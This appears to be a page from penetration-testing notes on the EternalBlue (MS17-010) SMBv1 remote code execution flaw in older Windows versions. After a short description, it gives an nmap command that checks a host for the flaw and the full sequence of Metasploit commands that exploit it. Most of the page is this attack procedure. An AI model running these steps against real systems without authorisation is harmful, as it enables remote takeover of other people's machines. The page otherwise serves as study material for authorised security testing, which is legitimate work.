Eternal blue vulnerability

The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability."

Enumeration

sudo nmap --script smb-vuln-ms17-010 -p445  <ip address>

Metasploit Exploitation

msfconsole
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <ip address>
exploit

PreviousBrute force and LoginNextRDP

Last updated